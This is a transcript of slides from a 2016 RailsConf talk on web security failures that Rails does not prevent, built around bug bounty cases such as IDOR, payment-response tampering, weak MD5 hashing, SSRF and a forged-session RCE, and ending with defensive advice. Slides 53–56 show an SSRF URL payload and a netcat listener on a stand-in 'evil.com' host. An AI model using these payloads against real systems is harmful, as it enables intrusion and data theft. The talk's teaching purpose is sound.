"...But Doesn't Rails Take Care of Security for Me?"

"...But Doesn't Rails Take Care of Security for Me?"

Rails comes with protection against SQL injection, cross site scripting, and cross site request forgery. It provides strong parameters and encrypted session cookies out of the box. What else is there to worry about? Unfortunately, security does not stop at the well-known vulnerabilities and even the most secure web framework cannot save you from everything. Let's take a deep dive into real world examples of security gone wrong!

711272a06d435ca5139b50874351cdbf?s=128

Justin Collins

May 06, 2016
Tweet

Transcript

  1. @presidentbeef “...But Doesn’t Rails Take Care of Security for Me?”

    “...But Doesn’t Rails Take Care of Security for Me?” Justin Collins @presidentbeef RailsConf 2016 Justin Collins @presidentbeef RailsConf 2016
  2. @presidentbeef No.

  3. @presidentbeef Thank you!

  4. @presidentbeef Ugh about me 6 years of application security (AT&T

    Interactive, Twitter, SurveyMonkey) 6 years working on Brakeman OSS (Static analysis security tool for Rails) 2 years working on (More pro static analysis security tool for Rails)
  5. @presidentbeef What Rails Does and Doesn’t

  6. @presidentbeef Security Theater

  7. @presidentbeef

  8. @presidentbeef https://hackerone.com/reports/27404

  9. @presidentbeef

  10. @presidentbeef POST /accounts/18ce53wqoxd/payment_methods/handle_failed/220152

  11. @presidentbeef POST /accounts/18ce53wqoxd/payment_methods/handle_failed/220152

  12. @presidentbeef POST /accounts/18ce53wqoxd/payment_methods/handle_failed/220151

  13. @presidentbeef PaymentMethod.find(params[:id]).delete

  14. @presidentbeef “Insecure Direct Object Reference” “Unscoped Find”

  15. @presidentbeef current_user.payment_methods.find(params[:id]).delete

  16. @presidentbeef Bounty: $2,800

  17. @presidentbeef https://randywestergren.com/united-airlines-bug-bounty-an-experience-in-reporting-a-serious-vulnerability/

  18. @presidentbeef Proxy

  19. @presidentbeef POST https://smartphone.continental. com/UnitedMobileDataServices/api/wallet/AccessWalletItemsv2 { "accessCode": "'", "application": { "version":

    { "build": "", "displayText": "2.0.20", "major": "", "minor": "" }, "name": "Android", "isProduction": true, "id": 2 }, "deviceID": "37556b06-66bf-40a3-9368-f13b0faa437d", "languageCode": "en-US", "mpNumber": "***REMOVED***", "pushToken": "***REMOVED***", "transactionId": "***REMOVED***", "backgroundRefresh": true }
  20. @presidentbeef { "walletPNRResponse": { "pnrs": [ { "mpNumber": "***REMOVED***", "recordLocator":

    "***REMOVED***", "flightDate": "12/05/2015 06:35 PM", "origin": "PHL", "originCity": "Philadelphia", "destination": "MCO", "destinationCity": "Orlando", "checkInStatus": "0", "firstName": "RANDOLPHA", "lastName": "WESTERGRENJR", "segments": [ { "recordLocator": "***REMOVED***", "carrierCode": "UA", "flightNumber": "3336", "origin": "PHL", "destination": "IAD", "scheduledDepartureDateTime": "12/5/2015 6:35 PM", "scheduledArrivalDateTime": "12/5/2015 7:41 PM", "scheduledDepartureDateTimeGMT": "12/05/2015 11:35 PM", "scheduledArrivalDateTimeGMT": "12/06/2015 12:41 AM", "seats": "", "activationDateTimeGMT": "", "flightStatusSegment": null, "flightStatus": null, "destinationWeather": null, "lastUpdated": "05/27/2015 07:31 AM", "enableUberLinkButton": false, "cabin": "Coach", "cabinType": "United Economy" }, #...
  21. @presidentbeef { "walletPNRResponse": { "pnrs": [ { "mpNumber": "***REMOVED***", "recordLocator":

    "***REMOVED***", "flightDate": "12/05/2015 06:35 PM", "origin": "PHL", "originCity": "Philadelphia", "destination": "MCO", "destinationCity": "Orlando", "checkInStatus": "0", "firstName": "RANDOLPHA", "lastName": "WESTERGRENJR", #...
  22. @presidentbeef

  23. @presidentbeef Bounty: $0 (Duplicate)

  24. @presidentbeef http://www.ifc0nfig.com/dominos-pizza-and-payments/

  25. @presidentbeef 1. CC # 2. Success Ref # 3. Order

    # Ref #
  26. @presidentbeef 1. CC # 2. Failure Ref # X

  27. @presidentbeef WARNING: XML AHEAD

  28. @presidentbeef Payment Failure Response <Response> <CardTxn> <authcode>NOT AUTHORISED</authcode> <card_scheme>VISA</card_scheme> </CardTxn>

    <datacash_reference>3340105259009953</datacash_reference> <merchantreference>3340105259009953</merchantreference> <mode>LIVE</mode> <reason>DECLINED</reason> <status>7</status> <time>1449024000</time> </Response>
  29. @presidentbeef Payment Failure Response <Response> <CardTxn> <authcode>NOT AUTHORISED</authcode> <card_scheme>VISA</card_scheme> </CardTxn>

    <datacash_reference>3340105259009953</datacash_reference> <merchantreference>3340105259009953</merchantreference> <mode>LIVE</mode> <reason>SUCCESS</reason> <status>1</status> <time>1449024000</time> </Response>
  30. @presidentbeef 1. CC # 2. Failure Ref # X

  31. @presidentbeef 1. CC # 2. Success Ref # X

  32. @presidentbeef 1. CC # 2. Success Ref # 3. Order

    # Ref #
  33. @presidentbeef

  34. @presidentbeef Lack of Server-Side Validation

  35. @presidentbeef http://cynosureprime.blogspot.com/2015/09/how-we-cracked-millions-of-ashley.html

  36. @presidentbeef ~36 million passwords leaked

  37. @presidentbeef ~36 million passwords leaked Hashed with bcrypt (good)

  38. @presidentbeef WARNING: PHP CODE AHEAD

  39. @presidentbeef But... $password = User::encryptPassword($Values['password']); $loginkey = md5(strtolower($username).'::'.strtolower($password));

  40. @presidentbeef BUT... $password = $Values['password']; $loginkey = md5(strtolower($username).'::'.strtolower($password));

  41. @presidentbeef Also... md5(lc($username)."::".lc($pass).":".lc($email).":73@^bhhs&#@&^@8@*$")

  42. @presidentbeef 2.6 million passwords cracked

  43. @presidentbeef 2.6 million passwords cracked In a few hours

  44. @presidentbeef 11.7 million passwords cracked In a few days

  45. @presidentbeef Weak Hashing Algorithm

  46. @presidentbeef http://www.anandpraka.sh/2016/03/how-i-could-have-hacked-your-facebook.html

  47. @presidentbeef

  48. @presidentbeef beta.facebook.com

  49. @presidentbeef Missing rate limit

  50. @presidentbeef Bounty: $15,000

  51. @presidentbeef https://hackerone.com/reports/115748

  52. @presidentbeef

  53. @presidentbeef https://imgur.com/vidgif/url?url=http://bit.ly/1e1EYJv

  54. @presidentbeef https://imgur.com/vidgif/url?url=http://bit.ly/1e1EYJv Server-Side Request Forgery

  55. @presidentbeef https://imgur.com/vidgif/url?url=sftp://bit.ly/1e1EYJv

  56. @presidentbeef Capture Connection Strings evil.com:$ nc -v -l 11111 Listening

    on [0.0.0.0] (family 0, port 11111) Connection from [54.166.236.232] port 11111 [tcp/*] accepted CLIENT libcurl 7.40.0 QUIT
  57. @presidentbeef Libcurl supports: SSH (scp://, sftp://) POP3 IMAP SMTP FTP

    DICT GOPHER TFTP
  58. @presidentbeef Bounty: $2,000

  59. @presidentbeef http://exfiltrated.com/research-Instagram-RCE.php

  60. @presidentbeef https://sensu.instagram.com/

  61. @presidentbeef

  62. @presidentbeef Rails App

  63. @presidentbeef

  64. @presidentbeef

  65. @presidentbeef Session cookie is signed marshalled code

  66. @presidentbeef Signing key = Remote code execution

  67. @presidentbeef Forged Session Remote Shell

  68. @presidentbeef And then things got worse...

  69. @presidentbeef Forged Session Remote Shell

  70. @presidentbeef Forged Session Remote Shell Passwords!

  71. @presidentbeef Forged Session Remote Shell Passwords! Bcrypt :(

  72. @presidentbeef Six passwords were "changeme" Three were same as the

    user's name Two were "password" One was "instagram"
  73. @presidentbeef

  74. @presidentbeef Forged Session Remote Shell

  75. @presidentbeef Secret in source code Outdated dependencies Weak passwords Keys

    sitting on servers
  76. @presidentbeef Bounty: $2,500 + A lot of drama

  77. @presidentbeef In Summary Verify current user can access data/perform action

    Never trust the client - think about trust relationships Always use strong hashing algorithms Rate limit important actions Avoid storing secrets in source code Always use strong passwords
  78. @presidentbeef More Resources OWASP Top 10 Web Vulnerabilities www.owasp.org/index.php/Top_10_2013-Top_10 OWASP

    Top 10 Proactive Security Controls www.owasp.org/index.php/OWASP_Proactive_Controls RailsGoat https://github.com/OWASP/railsgoat nVisium SecCasts https://nvisium.com/seccasts/
  79. @presidentbeef Things I’ll Forget to Mention I have stickers Security

    BoF after Jess’ talk I am happy to speak at companies in the SF area @presidentbeef | @brakeman | @brakemanpro